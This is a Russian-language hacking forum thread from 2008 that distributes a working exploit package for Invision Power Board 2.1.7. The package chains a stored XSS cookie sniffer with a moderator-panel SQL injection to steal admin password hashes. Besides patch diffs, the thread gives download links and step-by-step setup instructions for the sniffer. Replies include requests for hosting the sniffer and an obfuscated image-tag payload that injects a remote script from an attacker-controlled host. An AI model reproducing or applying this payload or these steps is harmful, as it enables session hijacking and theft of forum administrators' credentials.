Форумы Invision Power Board 2.1.7 Exploit

Discussion in 'Уязвимости CMS/форумов' started by Евгений Минаев, 4 Jan 2008.

  1. Евгений Минаев

    Евгений Минаев Elder - Старейшина

    Joined:
    12 Nov 2007
    Messages:
    55
    Likes Received:
    169
    Reputations:
    159
    ----[ NITRO ... ]

    Эта уязвимость была найдена с года два назад да и патч к ней уже существует год , форумов с этой версией становится все меньше а это значит что пора опубликовать рабочий эксплоит . Суть его работы состоит в сборе сессий юзеров с помощью активной xss иньекции , размещенной самим юзером , и получении данных с помощью SQL иньекции. Эксплоит состоит из нескольких частей - генератор активной xss , javascript файл , который будет вызван при посещении страницы с xss , просмотрщик логов и компонент , который извлечет данные из MySQL таблицы форума нужные данные в случае если перехваченная сессипринадлежала человеку с правами модератора.

    ----[ ACTIVE XSS ... ]

    Скрипт xss.php , входящий в состав пакета , сгенерирует xss для последующего размещения ее в теме . В качестве ссылки следует указать полный путь до файла ya.js ( в котором вы уже предварительно исправили путь на свой ) , скорей всего останется всего лишь нажать на кнопку так как путь уже выставлен програмно .

    Патч

    sources/classes/bbcode/class_bbcode_core.php, Function "regex_check_image", line 924:

    1.
    PHP:
    $default "[img]".$url."[/img]"
    PHP:
    $default "[img]".str_replace'[''['$url )."[/img]"
    2.
    PHP:
    if ( preg_match"/[?&;]/"$url) ) 
    PHP:
    if ( preg_match"/[?&;\<\[]/"$url) ) 
    sources/classes/bbcode/class_bbcode_core.php, Function "post_db_parse_bbcode", line 486

    1.
    PHP:
    preg_match_all"#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si"$t$match ); 
    PHP:
    preg_match_all"#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si"$t$match );

    if ( 
    $row['bbcode_tag'] == 'snapback' )
    {
        
    $match[2][$i] = intval$match[2][$i] );


    ----[ SQL INJECTION ... ]

    Иньекция осуществима лишь тогда , когда имеется сессия пользователя с доступом в модераторскую панель .

    Патч.Необходимо привести параметр starter к числовому виду посредством функции intval

    ----[ SNIFFER ... ]

    Результат работы эксплоита оформлен в виде простого php cookie сниффера .

    В случае удачного проведения SQL иньекции будут также представленая полная информация о администраторском составе форума

    ----[ EOF ... ]

    Выражаю большую благодарность лицам из закрытых разделов Античата , а также всем кто меня знает и не знает , тем кто дышал и не дышал в этот момент за поддержку . Скорей всего скрипт не работает или работает не так как надо . Вся информация указана выше . Надеюсь скоро линк умрет и тема будет удалена xD

    www.underwater.itdefence.ru/isniff.rar
    http://www.milw0rm.com/exploits/4841


     
    #1 Евгений Минаев, 4 Jan 2008
    Last edited: 5 Jan 2008
    8 people like this.
  2. Mo4x

    Mo4x VX-эпоха перемен

    Joined:
    18 Feb 2007
    Messages:
    369
    Likes Received:
    194
    Reputations:
    -21
    Евгений Минаев

    Большое спасибо только я одного не понял
    почему ты это не запостил в закреплёной теме ipb
    удобней же когда все в одном месте .
     
  3. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    str_replace( '[', '[', $url )
    смысл?
     
    1 person likes this.
  4. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    Мне можно тут выложить фикс кода или это сделано спецально?
     
  5. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Doom123, написали что фикс существует уже год....
    Найдут кому надо...
     
  6. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Хм... Попробовал на локалхосте- XSS действительно работает. Подменил куки - F5 - и я уже модер. Только вот не получается провести инъекцию- как заюзать скрипт exploit.php? :confused:
     
  7. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    Isis, Фикс в самом сплоите от иньекцию криво делает соль не правельную выводит... я и хотел фикс выставить ток не знал еси эт спецально сделано...
     
    1 person likes this.
  8. Devoldini

    Devoldini Elder - Старейшина

    Joined:
    28 Jun 2008
    Messages:
    18
    Likes Received:
    5
    Reputations:
    -6
    Патч мутим для замазки уязвимости?
    Обьясните как сделать Sql Injection подробнее...
     
  9. _Sanich

    _Sanich New Member

    Joined:
    11 Feb 2008
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Подскажите бесплатный хостинг где можно разместить сниффер(где пробывал не работает).
     
  10. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Вот тебе решение без геммороя
    --------------------------------
    Народ дайте пожалуйста эксплойт перловый для IPB 2.1.X версий,к нему прикручин GUI интерфейс,и кажись называеться r57ipb... что-то такое,ну вообщем,буду благодарен!
     
    #10 DDoSька, 30 Jul 2008
    Last edited: 30 Jul 2008
  11. Shred

    Shred Elder - Старейшина

    Joined:
    22 May 2006
    Messages:
    200
    Likes Received:
    29
    Reputations:
    0
    пага нереально долго грузится :( , у тебя нормально сервис работает?
     
  12. _Sanich

    _Sanich New Member

    Joined:
    11 Feb 2008
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    http://www.milw0rm.com/exploits/2010
     
    #12 _Sanich, 31 Jul 2008
    Last edited: 31 Jul 2008
  13. PandoraBox

    PandoraBox Elder - Старейшина

    Joined:
    6 May 2007
    Messages:
    262
    Likes Received:
    176
    Reputations:
    7
    HTML:
    Все предельно просто. Допустим наш снифер находится по адресу localhost/sniff/, а форум - test.ru/forum/
    
    Открываем ya.js блокнтом, правим путь до host/path/ya.gif , в данном случае пишем http://localhost/sniff/ya.gif, на файл data.txt выставляем права 666.
    Затем заходим на xss.php и прописываем полный путь http://localhost/sniff/ya.js и жмем кнопку - попробуй ее не найти она там одна - и получаем код.
    Нашим юзером заходим на форум, постим это сообщение и ждем когда его прочитают модеры.
    В случае если ктото с модераторскими - или выше - правами зайдет в нашу тему, скрипт получит хеши и соли всего администраторского состава, все это вы можете посмотреть на view.php
    www.underwater.itdefence.ru/isniff.rar
    www.milw0rm.com/sploits/2008-isniff.rar
     
    #13 PandoraBox, 24 Aug 2008
    Last edited: 24 Aug 2008
  14. Менеджер

    Менеджер New Member

    Joined:
    16 Apr 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Сделал пост.
    Не сработало.
    Форум изменил код на:
    <img src="http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromCharCode(115,99,114,105,112,116)),script.src=/http:xxzamenil.zamenil.ruxsniffxya.js/.source.replace(/x/g,String.fromCharCode(47)),head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script) style=visibility:hidden =[/snapback].gif" border="0" alt="Изображение" />

    Форум пропатченный?
    Я правильно понимаю, что нужно искать другую уязвимость?
    Я новичек.​
     
  15. eNergy

    eNergy Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    149
    Likes Received:
    32
    Reputations:
    -5
    перезалейте файл http://www.underwater.itdefence.ru/isniff.rar